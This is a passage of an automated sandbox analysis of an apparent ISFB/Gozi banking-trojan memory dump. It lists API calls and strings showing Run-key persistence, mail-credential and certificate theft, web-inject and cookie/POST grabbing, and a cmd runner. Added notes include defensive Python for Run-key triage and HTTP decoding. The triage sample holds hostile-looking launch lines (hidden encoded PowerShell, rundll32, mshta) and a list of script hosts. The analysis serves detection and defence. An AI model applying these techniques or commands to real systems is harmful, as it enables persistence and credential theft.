• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: CloseFreeHeap$CriticalEventHandleSectionThread$CreateDeleteEnterErrorFileLastLeaveOpenResumeSleepSuspend
• String ID: Software\Microsoft\Windows\CurrentVersion\Run$zgF
• API String ID: 1011176505-1222981935
• Opcode ID: 4edf481778c246af590faab15820bc468a0f9a7c8abc51967b83bf1b743f6e3d
• Instruction ID: 64bd2b2413ed98e8c6653743ad0dd1b483a8eac964ea0f11da900c33c1c4ff20
• Opcode Fuzzy Hash: 4edf481778c246af590faab15820bc468a0f9a7c8abc51967b83bf1b743f6e3d
• Instruction Fuzzy Hash: D4419576D00119FFDB105F90DC888AEBBB9FB06304B12453AF501E2221EBB55D85DB5B
Uniqueness

Uniqueness Score: -1.00%
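The routine above opens `Software\Microsoft\Windows\CurrentVersion\Run` under 0x80000001 (HKEY_CURRENT_USER), deletes a file, then suspends a thread, signals an event, sleeps 500 ms (0x1F4) and resumes the thread, the shape of a self-update that swaps the persisted payload while its worker is paused. On a live host, the Run values of every user profile are therefore the first place to look. The Python below is an added triage example, not code from the report or from the sample: it takes Run values as (name, data) pairs and flags those that hand a file in a user-writable location to a script or DLL host. The host-binary list, the path heuristic and the sample values are assumptions made for the example; reading the key itself is left to whatever collects the registry (`reg query`, a forensic export, or `winreg` on Windows).

```python
import ntpath
import re

# Constructed HKCU\Software\Microsoft\Windows\CurrentVersion\Run values
# (name, data). They are illustrative, not values recovered from the report.
SAMPLE_RUN_VALUES = [
    ("OneDrive", r'"C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background'),
    ("api_x", r"rundll32.exe C:\Users\alice\AppData\Roaming\Qwaz\payload.dll,DllRegisterServer"),
    ("update", r"powershell -w hidden -enc SQBFAFgA"),
    ("scriptlet", r"mshta.exe C:\Users\alice\AppData\Local\Temp\a.hta"),
    ("Vmtools", r'"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr'),
]

# Assumed lists: hosts that execute whatever file they are pointed at, and
# directory names a standard user can write to without elevation.
LOLBIN_HOSTS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "powershell.exe",
                "wscript.exe", "cscript.exe", "cmd.exe"}
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public|Downloads)\\", re.I)
ENCODED_PS = re.compile(r"\s-(e|ec|enc|encodedcommand)\s", re.I)


def split_command(cmd):
    """Split a Run value into (program, args), honouring a quoted program path."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        if end > 0:
            return cmd[1:end], cmd[end + 1:].strip()
    prog, _, args = cmd.partition(" ")
    return prog, args.strip()


def triage_run_value(name, cmd):
    """Return the reasons this Run value deserves a look (empty list if none)."""
    prog, args = split_command(cmd)
    base = ntpath.basename(prog).lower()
    if base and not base.endswith(".exe"):
        base += ".exe"  # a bare "powershell" is resolved through PATH
    reasons = []
    if base in LOLBIN_HOSTS:
        reasons.append("host binary %s runs external content" % base)
    if USER_WRITABLE.search(cmd):
        reasons.append("references a user-writable path")
    if base == "powershell.exe" and ENCODED_PS.search(" " + args + " "):
        reasons.append("encoded PowerShell command")
    return reasons


def triage_run_values(values):
    """Map value name -> reasons for every suspicious entry in `values`."""
    findings = {}
    for name, cmd in values:
        reasons = triage_run_value(name, cmd)
        if reasons:
            findings[name] = reasons
    return findings


if __name__ == "__main__":
    for name, reasons in triage_run_values(SAMPLE_RUN_VALUES).items():
        print("%s: %s" % (name, "; ".join(reasons)))
```

Because the sample is a DLL, the entry a practitioner most expects to find is a `rundll32`/`regsvr32` line pointing under `%APPDATA%`; the encoded-PowerShell and `mshta` checks cover the loader stages the report's signatures list. Treat a hit as a pivot point, not a verdict, and confirm by hashing the referenced file.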

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00451370: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,004431E8,Kill), ref: 004513A8
                                                                                                                                          • Part of subcall function 00451370: RtlAllocateHeap.NTDLL(00000000,?), ref: 004513BC
                                                                                                                                          • Part of subcall function 00451370: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,004431E8,Kill), ref: 004513D6
                                                                                                                                          • Part of subcall function 00451370: RegCloseKey.KERNELBASE(?,?,00000000,?,?,?,?,?,?,004431E8,Kill,?,?), ref: 00451400
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,LastTask,?,?), ref: 0044BFBC
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00010000,LastTask), ref: 0044BFDA
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,0000011A,00000000,00000000,?), ref: 0044C00B
                                                                                                                                        • HeapFree.KERNEL32(00000000,004683E4,0000011B,00000000,00000000,00000000,00000000,?,00000001,004683E4,00000002,?,?), ref: 0044C082
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000400,LastTask), ref: 0044C147
                                                                                                                                        • wsprintfA.USER32 ref: 0044C15B
                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000), ref: 0044C166
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,0000010D,00000000,00000000), ref: 0044C180
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,LastTask,?,00000008,0000000B,?,?,?,00000001,00000000,?,00000001,004683E4,00000002,?), ref: 0044C1A2
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 0044C1BD
                                                                                                                                        • wsprintfA.USER32 ref: 0044C1CD
                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000), ref: 0044C1D8
                                                                                                                                          • Part of subcall function 00442520: lstrlen.KERNEL32(?,00000000,00000000,74B05520,?,?,?,00441568,0000010D,00000000,00000000), ref: 00442550
                                                                                                                                          • Part of subcall function 00442520: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00442566
                                                                                                                                          • Part of subcall function 00442520: memcpy.NTDLL(00000010,?,00000000,?,?,?,00441568,0000010D), ref: 0044259C
                                                                                                                                          • Part of subcall function 00442520: memcpy.NTDLL(00000010,00000000,00441568,?,?,?,00441568), ref: 004425B7
                                                                                                                                          • Part of subcall function 00442520: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000119,00000001), ref: 004425D5
                                                                                                                                          • Part of subcall function 00442520: GetLastError.KERNEL32(?,?,?,00441568), ref: 004425DF
                                                                                                                                          • Part of subcall function 00442520: HeapFree.KERNEL32(00000000,00000000,?,?,?,00441568), ref: 00442605
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,0000010D,00000000,00000000), ref: 0044C1F2
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00000001,00000000,?,00000001,004683E4,00000002,?,?), ref: 0044C202
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$Free$Allocate$lstrlen$QueryValuememcpywsprintf$CallCloseErrorLastNamedPipe
                                                                                                                                        • String ID: Cmd %s processed: %u$Cmd %u parsing: %u$LastTask
                                                                                                                                        • API String ID: 3733591251-3332907627
                                                                                                                                        • Opcode ID: 3a29d44d501c23318bf3dcf1107d8d51eeb0861fb3933d3e8aee5761c686a721
                                                                                                                                        • Instruction ID: 70ed9e837be4787ce2028097134126aa3f2e0086bac78981c628847aec5c2871
                                                                                                                                        • Opcode Fuzzy Hash: 3a29d44d501c23318bf3dcf1107d8d51eeb0861fb3933d3e8aee5761c686a721
                                                                                                                                        • Instruction Fuzzy Hash: F1719F71D01119BFEB209F95DCC4DAFBB78FB08344F04052AF505A2261EBB95D85CB6A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

APIs
• lstrlenW.KERNEL32(00000000,?,IMAP,Port,?,IMAP,Secure_Connection,?,IMAP,User_Name,?,IMAP,Server,00000000,00000000,00000000), ref: 004654F0
• lstrcpyW.KERNEL32(00000000,00470708), ref: 00465508
• lstrcatW.KERNEL32(00000000,00000000), ref: 00465510
• lstrlenW.KERNEL32(00000000,?,0047045E,Password2,?,IMAP,Port,?,IMAP,Secure_Connection,?,IMAP,User_Name,?,IMAP,Server), ref: 00465555
• memcpy.NTDLL(00000000,?,00000008,00000006,?,?,0044B7EA,?,00000001,?), ref: 004655AE
• LocalFree.KERNEL32(?,00000006,?,?,0044B7EA,?,00000001,?), ref: 004655C5
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
• String ID: HTTPMail$IMAP$P$POP3$Password2$Port$SMTP$Secure_Connection$Server$User_Name$zlF
• API String ID: 3649579052-3706155206
• Opcode ID: 02d9b3bfd9b58fa13fdbfad22317ad2e321725f51ac12310c5171961914c893d
• Instruction ID: 91ddf3fb81f4fd804247ae99d35a595a997302ae1ebab1e60c2f780e49f6333b
• Opcode Fuzzy Hash: 02d9b3bfd9b58fa13fdbfad22317ad2e321725f51ac12310c5171961914c893d
• Instruction Fuzzy Hash: E251A371D00609ABCF109FA6CC499DF7BB9FF44305F14442BF506B2251EBB89945CBAA
Uniqueness

Uniqueness Score: -1.00%

APIs
• lstrlen.KERNEL32(?,?,00000000), ref: 004615A8
• lstrlen.KERNEL32(?,?,00000000), ref: 004615AF
• RtlAllocateHeap.NTDLL(00000000,?), ref: 004615C6
• lstrcpy.KERNEL32(00000000,?), ref: 004615D7
• lstrcat.KERNEL32(?,?), ref: 004615F3
• lstrcat.KERNEL32(?,.pfx), ref: 004615FD
• RtlAllocateHeap.NTDLL(00000000,?), ref: 0046160E
• RtlAllocateHeap.NTDLL(00000000,?), ref: 004616A6
• CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,00000000), ref: 004616D6
• WriteFile.KERNEL32(00000000,?,?,?,00000000,?,00000000), ref: 004616EF
• CloseHandle.KERNEL32(00000000,?,00000000), ref: 004616F9
• HeapFree.KERNEL32(00000000,?,?,00000000), ref: 00461709
• HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 00461724
• HeapFree.KERNEL32(00000000,?,?,00000000), ref: 00461734
Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
                                                                                                                                        • String ID: .pfx$ISFB$hF
                                                                                                                                        • API String ID: 333890978-2075936733
                                                                                                                                        • Opcode ID: 1f3b6f6b8237338597dfb3ea36e2d55eb26390818182df7e93eba9930feed84c
                                                                                                                                        • Instruction ID: 8ccddeb11dfe70dbb18e1ba751c94fb8fbea009a3860b05dd36ba0dbbb285b3b
                                                                                                                                        • Opcode Fuzzy Hash: 1f3b6f6b8237338597dfb3ea36e2d55eb26390818182df7e93eba9930feed84c
                                                                                                                                        • Instruction Fuzzy Hash: 3D51ADB6900208BFCB119FA4DC84CAE7B79FF08355B054436F905E3270EA719E45CBAA
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(WININET.DLL,?,00000000,00000000,?,?), ref: 00453063
                                                                                                                                        • TlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0045DB81), ref: 0045306D
                                                                                                                                        • LoadLibraryA.KERNEL32(ieframe), ref: 0045308F
                                                                                                                                        • LoadLibraryA.KERNEL32(ieui), ref: 00453096
                                                                                                                                        • LoadLibraryA.KERNEL32(mshtml), ref: 0045309D
                                                                                                                                        • LoadLibraryA.KERNEL32(inetcpl.cpl), ref: 004530A4
                                                                                                                                        • LoadLibraryA.KERNEL32(ieapfltr), ref: 004530AB
                                                                                                                                        • LoadLibraryA.KERNEL32(urlmon), ref: 004530B2
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,?,0000000C,00000000,WININET.dll), ref: 0045313A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad$AllocFreeHeap
                                                                                                                                        • String ID: WININET.DLL$WININET.dll$ieapfltr$ieframe$ieui$inetcpl.cpl$mshtml$urlmon
                                                                                                                                        • API String ID: 356845663-1120705325
                                                                                                                                        • Opcode ID: 916015298f47e6e50ae8af7dba3ebaab02079597587dc97b581b0fe172080999
                                                                                                                                        • Instruction ID: ca1682b0159335f12826812a5f8f56bdd698c4172cc24a3c9f554f45dc59ea2d
                                                                                                                                        • Opcode Fuzzy Hash: 916015298f47e6e50ae8af7dba3ebaab02079597587dc97b581b0fe172080999
                                                                                                                                        • Instruction Fuzzy Hash: 2521E930E00214BBDB10AFE6DC82A5E7FA4EB04752F10047BE545D7192E7B85E498B6F
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • lstrlenW.KERNEL32(?,00000000,?,?,\sols,\sols,00453424,?,?,%userprofile%\AppData\Local\,?,00000000), ref: 004488E7
                                                                                                                                        • lstrlenW.KERNEL32(\sols,?,00000000), ref: 004488F2
                                                                                                                                        • lstrlenW.KERNEL32(?,?,00000000), ref: 004488FA
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 0044890F
                                                                                                                                        • lstrcpyW.KERNEL32(00000000,?), ref: 00448920
                                                                                                                                        • lstrcatW.KERNEL32(00000000,\sols), ref: 00448932
                                                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000), ref: 00448937
                                                                                                                                        • lstrcatW.KERNEL32(00000000,004683E0), ref: 00448943
                                                                                                                                        • lstrcatW.KERNEL32(00000000,?), ref: 0044894B
                                                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000), ref: 00448950
                                                                                                                                        • lstrcatW.KERNEL32(00000000,004683E0), ref: 0044895C
                                                                                                                                        • lstrcatW.KERNEL32(00000000,00000002), ref: 00448977
                                                                                                                                        • CopyFileW.KERNEL32(?,00000000,00000000,?,00000000), ref: 0044897F
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0044898D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
                                                                                                                                        • String ID: $4E$\sols
                                                                                                                                        • API String ID: 3635185113-1966809840
                                                                                                                                        • Opcode ID: f9a93604b8ec1506e4ea0ef6a4bfbc39eafb5425aba8af8e44b964757be6e838
                                                                                                                                        • Instruction ID: 5b2f8b9975361b616aaefe51ef3b87147a62ab65b103e5a39d5425cce89960de
                                                                                                                                        • Opcode Fuzzy Hash: f9a93604b8ec1506e4ea0ef6a4bfbc39eafb5425aba8af8e44b964757be6e838
                                                                                                                                        • Instruction Fuzzy Hash: 0021D132500205BFD3216F54DC88F7F7BACEF85B94F02062EF50592261EFA59809CA6B
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • memcpy.NTDLL(?,HTTP/1.1 404 Not Found,0000001A,00000000,?,00000000,0044AF60,?,00000000), ref: 00449E06
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000008,?,?), ref: 00449FBF
                                                                                                                                        • lstrlen.KERNEL32(00000008,00000000), ref: 0044A011
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeHeaplstrlenmemcpy
                                                                                                                                        • String ID: chunked$Access-Control-Allow-Origin:$Cache-Control:$Content-Encoding:$Content-Length:$Content-Security-Policy-Report-Only:$Content-Security-Policy:$Content-Type:$Etag:$HTTP/1.1 404 Not Found$Last-Modified:$Transfer-Encoding:$X-Frame-Options$gzip$no-cache, no-store, must-revalidate
                                                                                                                                        • API String ID: 462153822-754885170
                                                                                                                                        • Opcode ID: f7d0ba1cb1f8b9709855d95727c4e6bab5941052da81a9960001eceac4c4b55f
                                                                                                                                        • Instruction ID: c0e101b5331b8389484e0a5161338325a5382335160549bfe0d4e3c8d3978ff5
                                                                                                                                        • Opcode Fuzzy Hash: f7d0ba1cb1f8b9709855d95727c4e6bab5941052da81a9960001eceac4c4b55f
                                                                                                                                        • Instruction Fuzzy Hash: FEA1A071A00201AFEB54DF66C885B9A7BA4BF04314B24419BFC45DB396EBB8EC44CF59
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%
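Editor's note on the function above: its string table is the set of response headers a web-inject proxy has to read before it can rewrite a page (the transfer-coding and content-coding it must undo, the CSP, frame and caching headers it cares about), and the memcpy of 0x1A bytes matches the 22-byte status line "HTTP/1.1 404 Not Found" plus CRLF CRLF, consistent with a canned empty 404 reply. The block below is an added example, not code from this report or from the sample: it decodes a raw HTTP/1.1 response the way any inspecting proxy must (dechunk, then gunzip) and reports which of the listed headers are present. The sample response in `build_sample_response` is constructed, and the exact bytes of the canned 404 are an inference from the length, not a verified dump.

```python
import gzip

# Response headers named in the function's string table; lower-cased for lookup.
WATCHED_HEADERS = (
    "access-control-allow-origin",
    "cache-control",
    "content-encoding",
    "content-length",
    "content-security-policy",
    "content-security-policy-report-only",
    "content-type",
    "etag",
    "last-modified",
    "transfer-encoding",
    "x-frame-options",
)

# 0x1A (26) bytes: 22-byte status line plus CRLF CRLF. The length matches the memcpy in the
# listing; that this is the exact byte string copied is an inference, not a verified dump.
CANNED_404 = b"HTTP/1.1 404 Not Found\r\n\r\n"


def dechunk(body: bytes) -> bytes:
    """Undo HTTP/1.1 chunked transfer-coding (RFC 7230 section 4.1)."""
    out = bytearray()
    pos = 0
    while True:
        line_end = body.index(b"\r\n", pos)
        size_field = body[pos:line_end].split(b";", 1)[0].strip()  # drop chunk extensions
        size = int(size_field, 16)
        pos = line_end + 2
        if size == 0:
            break  # last-chunk; any trailer section after it is ignored here
        out += body[pos:pos + size]
        pos += size + 2  # skip the chunk data and its trailing CRLF
    return bytes(out)


def decode_http_response(raw: bytes):
    """Split a raw HTTP/1.1 response into (status_line, headers, body, watched).

    headers : lower-cased header name -> value (last occurrence wins)
    body    : payload after removing chunked transfer-coding and gzip content-coding,
              i.e. the plaintext an inject engine would actually have to edit
    watched : sorted names from WATCHED_HEADERS that the response carries
    """
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    status_line = lines[0]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    if "chunked" in headers.get("transfer-encoding", "").lower():
        body = dechunk(body)
    if headers.get("content-encoding", "").lower() == "gzip":
        body = gzip.decompress(body)
    watched = sorted(h for h in WATCHED_HEADERS if h in headers)
    return status_line, headers, body, watched


def build_sample_response() -> bytes:
    """Constructed sample (not captured traffic): a gzip-compressed, chunked HTML page
    served with a CSP header, split into two chunks to exercise the dechunker."""
    html = b"<html><body><form action='/login'><input name='pass'></form></body></html>"
    gz = gzip.compress(html, mtime=0)
    half = len(gz) // 2
    chunked = (f"{half:x}\r\n".encode() + gz[:half] + b"\r\n"
               + f"{len(gz) - half:x}\r\n".encode() + gz[half:] + b"\r\n"
               + b"0\r\n\r\n")
    head = (b"HTTP/1.1 200 OK\r\n"
            b"Content-Type: text/html\r\n"
            b"Content-Encoding: gzip\r\n"
            b"Transfer-Encoding: chunked\r\n"
            b"Content-Security-Policy: default-src 'self'\r\n"
            b"X-Frame-Options: DENY\r\n"
            b"Cache-Control: no-cache, no-store, must-revalidate\r\n"
            b"\r\n")
    return head + chunked


if __name__ == "__main__":
    status, hdrs, body, watched = decode_http_response(build_sample_response())
    print(status, watched)
    print(body.decode())
```

Running the block prints the decoded page and the six watched headers the sample carries. When comparing a response captured on the wire against what the browser rendered, a missing `content-security-policy` or `x-frame-options` in the browser-side copy is the kind of discrepancy this header set points at.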

                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 0045A665
                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 0045A684
                                                                                                                                        • GetLastError.KERNEL32 ref: 0045A941
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 0045A951
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 0045A962
                                                                                                                                        • RtlExitUserThread.NTDLL(?), ref: 0045A970
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocCriticalSectionVirtual$EnterErrorExitLastLeaveThreadUser
                                                                                                                                        • String ID: .lF$8hF$\lF$flF$ghF
                                                                                                                                        • API String ID: 2137648861-1764878820
                                                                                                                                        • Opcode ID: d92b2c85501a74ca9ebd406fa1d015784a8eb5a43ad9926213f955400ad4bbb5
                                                                                                                                        • Instruction ID: 60d62b0acc32bae356cf1994cfee13f2256323a0c4d7c1d27ff133e471a51bdd
                                                                                                                                        • Opcode Fuzzy Hash: d92b2c85501a74ca9ebd406fa1d015784a8eb5a43ad9926213f955400ad4bbb5
                                                                                                                                        • Instruction Fuzzy Hash: DBA140B0900709AFDB309F21CC44AAA77B9FF18305F104A2AF915D2262E774DC59CF5A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0044EB80
                                                                                                                                        • memcpy.NTDLL(?,?,00000010), ref: 0044EBA3
                                                                                                                                        • memset.NTDLL ref: 0044EBEF
                                                                                                                                        • lstrcpyn.KERNEL32(?,?,00000034), ref: 0044EC03
                                                                                                                                        • GetLastError.KERNEL32 ref: 0044EC31
                                                                                                                                        • GetLastError.KERNEL32 ref: 0044EC74
                                                                                                                                        • GetLastError.KERNEL32 ref: 0044EC93
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000927C0), ref: 0044ECCD
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000000), ref: 0044ECDB
                                                                                                                                        • GetLastError.KERNEL32 ref: 0044ED50
                                                                                                                                        • ReleaseMutex.KERNEL32(?), ref: 0044ED62
                                                                                                                                        • RtlExitUserThread.NTDLL(?), ref: 0044ED78
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$ObjectSingleWait$ExitMutexReleaseThreadUserlstrcpynmemcpymemset
                                                                                                                                        • String ID: HlF$RlF$plF
                                                                                                                                        • API String ID: 4037736292-771404280
                                                                                                                                        • Opcode ID: 4ede739e8c14ad0e5aeb22fd5a72cef2f888f49dde5f8d5e6d2f1f66196b8d8d
                                                                                                                                        • Instruction ID: cc692e899df3a708f9159096d1390eb9e5ab6a579862183f7e4076b121f03afd
                                                                                                                                        • Opcode Fuzzy Hash: 4ede739e8c14ad0e5aeb22fd5a72cef2f888f49dde5f8d5e6d2f1f66196b8d8d
                                                                                                                                        • Instruction Fuzzy Hash: F9616E71904701AFE7209F26DD48A1BB7E9BF84711F004E2EF596D2290E7B8E905CF5A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(03BD9608,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 0044564E
                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 0044565D
                                                                                                                                        • lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 0044566A
                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00445682
                                                                                                                                        • lstrlen.KERNEL32(0000000D,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044568E
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 004456AA
                                                                                                                                        • wsprintfA.USER32 ref: 00445762
                                                                                                                                        • memcpy.NTDLL(00000000,?,?), ref: 004457A7
                                                                                                                                        • InterlockedExchange.KERNEL32(0046E00C,00000000), ref: 004457C5
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 00445808
                                                                                                                                          • Part of subcall function 00450C0C: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00450C35
                                                                                                                                          • Part of subcall function 00450C0C: memcpy.NTDLL(00000000,?,?), ref: 00450C48
                                                                                                                                          • Part of subcall function 00450C0C: RtlEnterCriticalSection.NTDLL(0046E268), ref: 00450C59
  • Part of subcall function 00450C0C: RtlLeaveCriticalSection.NTDLL(0046E268), ref: 00450C6E
  • Part of subcall function 00450C0C: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 00450CA6
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
• String ID: Accept-Language: $Cookie: $Referer: $URL: %sREF: %sLANG: %sAGENT: %sCOOKIE: %sPOST: $USER: %s
• API String ID: 4198405257-1852062776
• Opcode ID: c0492a5284246c44003488cdcee78a138d8525737d4f956a055c25c21949a01c
• Instruction ID: c55d6f4265169cb76b1673b73e93d63ddf7ee83f6708fef313f770b21a552ed3
• Opcode Fuzzy Hash: c0492a5284246c44003488cdcee78a138d8525737d4f956a055c25c21949a01c
• Instruction Fuzzy Hash: 17519C71A00209EFDF109FA5DC84BAF7BA8EB04344F14453AF805E7252EBB89A55CB59
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.NTDLL ref: 0045E9B1
  • Part of subcall function 00449C8C: lstrlen.KERNEL32(?,00000008,00000000,?,74B05520,00458DBF,?,?,00000000,004414AA,?,00000000,?,00464A70,?,00000001), ref: 00449C9B
  • Part of subcall function 00449C8C: mbstowcs.NTDLL ref: 00449CB7
• lstrlenW.KERNEL32(00000000,00000000,00000000,77E5DBB0,00000000,cmd /C "%s> %s1"), ref: 0045E9EA
• wcstombs.NTDLL ref: 0045E9F4
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77E5DBB0,00000000,cmd /C "%s> %s1"), ref: 0045EA25
• WaitForMultipleObjects.KERNEL32(00000002,?,00000000,*<F), ref: 0045EA51
• TerminateProcess.KERNEL32(?,000003E5), ref: 0045EA67
• WaitForMultipleObjects.KERNEL32(00000002,?,00000000,?), ref: 0045EA7B
• GetLastError.KERNEL32 ref: 0045EA7F
• GetExitCodeProcess.KERNEL32(?,00000001), ref: 0045EA9F
• CloseHandle.KERNEL32(?), ref: 0045EAAE
• CloseHandle.KERNEL32(?), ref: 0045EAB3
• GetLastError.KERNEL32 ref: 0045EAB7
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Process$CloseErrorHandleLastMultipleObjectsWaitlstrlen$CodeCreateExitTerminatembstowcsmemsetwcstombs
• String ID: *<F$D$cmd /C "%s> %s1"
• API String ID: 2463014471-3239704061
• Opcode ID: 314c715358cc86c809db05a86ad8b3abbb39e57cdf900bfecc24ef7d472581fc
• Instruction ID: cc591039505e2b9a79f9066427cd57abcbdf9e810036a4356b655d87c1310454
• Opcode Fuzzy Hash: 314c715358cc86c809db05a86ad8b3abbb39e57cdf900bfecc24ef7d472581fc
• Instruction Fuzzy Hash: 39415F71900118FFEB11EFA5CD859EEBBBCFB08305F20446AF901B2211E6755F099B6A
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00461E71: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 00461EB6
  • Part of subcall function 00461E71: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 00461ECE
  • Part of subcall function 00461E71: WaitForSingleObject.KERNEL32(00000000,?,00000000,?,?,?,?,?,004413AA,00464A70,?,00000001), ref: 00461F94
  • Part of subcall function 00461E71: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,004413AA,00464A70,?,00000001), ref: 00461FBD
  • Part of subcall function 00461E71: HeapFree.KERNEL32(00000000,004413AA,?,00000000,?,?,?,?,?,004413AA,00464A70,?,00000001), ref: 00461FCD
